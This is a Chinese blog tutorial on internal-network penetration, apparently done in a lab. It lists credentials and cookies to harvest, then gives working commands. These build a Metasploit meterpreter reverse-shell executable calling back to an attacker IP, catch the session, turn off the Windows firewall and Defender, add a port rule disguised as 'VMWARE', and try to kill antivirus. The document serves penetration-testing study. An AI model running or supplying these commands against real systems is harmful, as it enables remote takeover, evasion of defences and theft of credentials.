使用msf接收反弹shell|内网渗透学习(一)

使用msf接收反弹shell|内网渗透学习(一)

image-20220927003205389

这里的内网渗透学习(一)~(三)的文章都是第一节MSF反弹shel收集信息的内容, 所以这三篇文章对标题的限定并不是那么的严格, 直接连着看下来的话就比较好理解了

内网信息收集思路

  1. 系统管理员密码
  2. 用户session, 3398, ipc链接记录, 用户回收站信息收集
  3. 浏览器账号密码和cookie获取
  4. Windows无线密码获取, 数据库密码获取
  5. host文件获取, DNS缓存学习收集
  6. 进程, 不定, 网络代理, 软件列表信息等
  7. VPN历史密码, teamview密码, 启动项, iislog等
  8. 使用信息收集工具

smf信息收集

ifconfig找到自己的ip然后执行反弹shell端口为444,生成反弹shell的paylaod如下:

msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.92.128 LPORT=444 > '/home/h0cksr/Desktop/windows-meterpreter-staged-reverse-tcp-444.exe'

image-20220923204625027

然后执行msfconsole进入msf控制行执行下面命令

msfconsole  
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.92.128
set lport 444
run

开启监听后把生成的文件拉出来放到另一个windowsXP虚拟机执行

image-20220923205036452

执行exe文件后可以在msf控制台界面中看到收到反弹回来的shell并且生成sessionid为3的session会话

image-20220923205006395

开始进入这个sessionid为3的会话

msf中执行命令关闭防火墙

shell或execute -f cmd -i -H#-f指定执行一个可执行程序, -H表示隐藏进程, -i通过创建的进程返回一个操作接口

进入windows命令行之后可能看到的是乱码的内容, 这时候可以通过chcp 65001将字符集编码改为UTF-8就可以正常显示了

image-20220923210148168

执行关闭防火墙的命令

netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles

通过策略添加防火墙规则隐藏行为:
netsh advfirewall set  add rule name="VMWARE" protocol=TCP dir=in localport=5555 action=allow
netsh firewall add portopening TCP 5555 "VMWARE"  ENABLE ALL
重启让配置生效:
shutdown -r -f -t 0

运行上面的配置之后就会开放5555端口, 可以支持我们的kali向windows的5555端口发出正向连接请求

关闭杀软

关闭defender:
net stop windefend
关闭杀软:
run killav
run post/windows/manage/killav

其实上面的杀软命令模块没啥luan用...

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇